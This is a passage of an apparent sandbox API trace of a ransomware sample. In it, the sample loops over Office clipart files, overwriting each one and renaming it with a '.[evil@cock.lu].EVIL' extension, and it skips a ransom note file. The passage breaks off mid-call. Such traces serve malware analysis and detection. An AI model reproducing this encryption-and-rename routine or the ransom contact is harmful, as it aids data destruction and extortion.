_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.335] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02424_.WMF") returned 0x0 [0161.335] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF") returned 0x45 [0161.335] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02424_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.337] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x53c, lpOverlapped=0x0) returned 1 [0161.340] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.340] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.340] _errno () returned 0x84b1160840 [0161.340] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.340] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x540, lpOverlapped=0x0) returned 1 [0161.340] CloseHandle (hObject=0x1a8) returned 1 [0161.340] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.340] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.340] __uncaught_exception () returned 0x84b1160800 [0161.340] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.341] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02424_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02424_.wmf.[evil@cock.lu].evil")) returned 1 [0161.342] ??_V@YAXPEAX@Z () returned 0x1 [0161.345] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF", dwFileAttributes=0x200) returned 0 [0161.345] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.345] wcsstr (_Str="NA02426_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.345] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF") returned 69 [0161.345] wcscmp (_String1="NA02426_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.345] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02426_.WMF") returned 0x0 [0161.345] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF") returned 0x45 [0161.345] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02426_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.347] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1948, lpOverlapped=0x0) returned 1 [0161.349] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.349] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.350] _errno () returned 0x84b1160840 [0161.350] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.350] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1960, lpOverlapped=0x0) returned 1 [0161.350] CloseHandle (hObject=0x1a8) returned 1 [0161.350] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.350] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.350] __uncaught_exception () returned 0x84b1160800 [0161.350] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.351] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02426_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02426_.wmf.[evil@cock.lu].evil")) returned 1 [0161.352] ??_V@YAXPEAX@Z () returned 0x1 [0161.355] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF", dwFileAttributes=0x200) returned 0 [0161.355] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.355] wcsstr (_Str="NA02431_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.355] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF") returned 69 [0161.355] wcscmp (_String1="NA02431_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.355] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02431_.WMF") returned 0x0 [0161.355] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF") returned 0x45 [0161.355] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02431_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.357] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c2c, lpOverlapped=0x0) returned 1 [0161.370] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.370] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.370] _errno () returned 0x84b1160840 [0161.370] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.370] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1c40, lpOverlapped=0x0) returned 1 [0161.370] CloseHandle (hObject=0x1a8) returned 1 [0161.370] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.370] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.370] __uncaught_exception () returned 0x84b1160800 [0161.370] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.371] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02431_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02431_.wmf.[evil@cock.lu].evil")) returned 1 [0161.372] ??_V@YAXPEAX@Z () returned 0x1 [0161.375] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF", dwFileAttributes=0x200) returned 0 [0161.375] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.375] wcsstr (_Str="NA02435_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.375] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF") returned 69 [0161.375] wcscmp (_String1="NA02435_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.375] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02435_.WMF") returned 0x0 [0161.375] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF") returned 0x45 [0161.375] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02435_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.377] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xff8, lpOverlapped=0x0) returned 1 [0161.380] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.380] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.380] _errno () returned 0x84b1160840 [0161.380] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.380] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1000, lpOverlapped=0x0) returned 1 [0161.380] CloseHandle (hObject=0x1a8) returned 1 [0161.381] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.381] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.381] __uncaught_exception () returned 0x84b1160800 [0161.381] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.381] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02435_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02435_.wmf.[evil@cock.lu].evil")) returned 1 [0161.383] ??_V@YAXPEAX@Z () returned 0x1 [0161.387] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF", dwFileAttributes=0x200) returned 0 [0161.387] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.387] wcsstr (_Str="NA02439_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.387] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF") returned 69 [0161.387] wcscmp (_String1="NA02439_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.387] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02439_.WMF") returned 0x0 [0161.387] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF") returned 0x45 [0161.387] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.390] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1434, lpOverlapped=0x0) returned 1 [0161.393] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.393] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.393] _errno () returned 0x84b1160840 [0161.393] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.393] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1440, lpOverlapped=0x0) returned 1 [0161.393] CloseHandle (hObject=0x1a8) returned 1 [0161.393] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.393] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.393] __uncaught_exception () returned 0x84b1160800 [0161.393] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.394] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02439_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02439_.wmf.[evil@cock.lu].evil")) returned 1 [0161.395] ??_V@YAXPEAX@Z () returned 0x1 [0161.446] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF", dwFileAttributes=0x200) returned 0 [0161.446] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.446] wcsstr (_Str="NA02441_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.446] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF") returned 69 [0161.446] wcscmp (_String1="NA02441_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.447] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02441_.WMF") returned 0x0 [0161.447] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF") returned 0x45 [0161.447] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.448] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3218, lpOverlapped=0x0) returned 1 [0161.451] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.451] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.451] _errno () returned 0x84b1160840 [0161.451] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.451] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3220, lpOverlapped=0x0) returned 1 [0161.451] CloseHandle (hObject=0x1a8) returned 1 [0161.452] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.452] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.452] __uncaught_exception () returned 0x84b1160800 [0161.452] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.452] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02441_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02441_.wmf.[evil@cock.lu].evil")) returned 1 [0161.453] ??_V@YAXPEAX@Z () returned 0x1 [0161.456] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF", dwFileAttributes=0x200) returned 0 [0161.456] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.456] wcsstr (_Str="NA02443_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.456] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF") returned 69 [0161.456] wcscmp (_String1="NA02443_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.456] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02443_.WMF") returned 0x0 [0161.456] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF") returned 0x45 [0161.456] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.458] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x55c, lpOverlapped=0x0) returned 1 [0161.460] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.460] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.460] _errno () returned 0x84b1160840 [0161.460] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.460] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x560, lpOverlapped=0x0) returned 1 [0161.461] CloseHandle (hObject=0x1a8) returned 1 [0161.461] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.461] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.461] __uncaught_exception () returned 0x84b1160800 [0161.461] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.461] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02443_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02443_.wmf.[evil@cock.lu].evil")) returned 1 [0161.462] ??_V@YAXPEAX@Z () returned 0x1 [0161.465] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF", dwFileAttributes=0x200) returned 0 [0161.465] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.465] wcsstr (_Str="NA02444_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.465] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF") returned 69 [0161.465] wcscmp (_String1="NA02444_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.465] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02444_.WMF") returned 0x0 [0161.465] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF") returned 0x45 [0161.465] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0161.467] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x88c, lpOverlapped=0x0) returned 1 [0161.471] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.471] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0161.471] _errno () returned 0x84b1160840 [0161.471] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.471] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x8a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8a0, lpOverlapped=0x0) returned 1 [0161.471] CloseHandle (hObject=0x1a8) returned 1 [0161.471] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0161.472] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0161.472] __uncaught_exception () returned 0x84b1160800 [0161.472] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0161.472] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02444_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02444_.wmf.[evil@cock.lu].evil")) returned 1 [0161.473] ??_V@YAXPEAX@Z () returned 0x1 [0161.476] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF", dwFileAttributes=0x200) returned 0 [0161.476] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0161.476] wcsstr (_Str="NA02446_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0161.476] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF") returned 69 [0161.476] wcscmp (_String1="NA02446_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0161.476] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02446_.WMF") returned 0x0 [0161.476] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF") returned 0x45 [0161.476] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF" 